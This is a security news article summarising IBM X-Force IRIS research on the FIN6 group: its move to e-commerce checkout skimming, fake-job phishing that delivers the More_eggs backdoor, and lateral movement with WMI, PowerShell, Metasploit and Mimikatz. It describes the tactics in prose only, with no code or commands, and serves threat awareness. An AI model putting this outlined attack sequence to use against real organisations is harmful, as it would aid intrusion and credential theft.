The financially motivated attack group known as FIN6 or ITG08 with primary focus on point-of-sale (POS) machines in brick-and-mortar retailers and companies in the hospitality sector in the U.S. and Europe has recently changed its tactics in favour of e-commerce sites. The new development has been brought to light by researchers at IBM X-Force Incident Response and Intelligence Services (IRIS) who detected new attacks targeting e-commerce environments by injecting malicious code into online checkout pages of compromised websites (technique known as online skimming).
According to IRIS’ analisys, the group actively targets multinational organizations luring the companies’ employees with spear phishing emails into downloading More_eggs JScript backdoor malware (also known as Terra Loader and SpicyOmelette). The backdoor is offered on the Dark Web as a malware-as-a-service (MaaS). Attackers use it to create, expand and cement their foothold in compromised environments.
Additionally, in observed attacks FIN6 was using tactics well-known from previous campaigns by the group, like using Windows Management Instrumentation (WMI) to automate the remote execution of PowerShell scripts, PowerShell commands with base64 encoding, and Metasploit and PowerShell to move laterally and deploy malware. Also, the attackers used Comodo code-signing certificates several times during the course of the campaign, according to IRIS.
To gain access to victim environments, FIN6 handpicked employees using LinkedIn messaging and email, advertising fake jobs.
“In one case, we uncovered evidence indicating that the attacker had established communication with a victim via email and convinced them to click on a Google Drive URL purporting to contain an attractive job advert. Once clicked, the URL displayed the message, “Online preview is not available,” then presented a second URL leading to a compromised or rogue domain, where the victim could download the payload under the guise of a job description,” reads the research.
That URL, in turn, downloaded a ZIP file containing a malicious Windows Script File (WSF) that initiated the infection routine of the More_eggs backdoor, which established a reverse shell connection to the attacker’s command-and-control (C&C) infrastructure. Once the malware was installed on the victim’s system the ZIP file and WSF files were deleted, likely in an attempt to avoid recovering the original files from the filesystem, said the researchers.
The More_eggs malware is capable of downloading and executing other files and scripts, and can run commands using cmd.exe. In this campaign the malware downloaded a signed binary shellcode loader and a signed Dynamic Link Library (DLL) to create a reverse shell and connect to a remote host. Upon gaining access to the network, the attackers employed WMI and PowerShell techniques to perform network reconnaissance and move laterally within the environment.
“The attackers used this technique to remotely install a Metasploit reverse TCP stager on select systems, subsequently spawning a Meterpreter session and Mimikatz,” according to the report.
Meterpreter is a payload component in the Metasploit Framework that uses in-memory DLL injection, which can lead to a compromise by malware or any malicious code/commands. Mimikatz is a post-exploitation tool that allows attackers to extract credentials from memory.
Once in the network the bad actors also installed More_eggs backdoor on several additional devices thus creating multiple ways to get back into the network.
More detailed technical write up on the More_eggs malware as well as a list of Indicators of Compromise (IoCs) is provided in IBM blog post.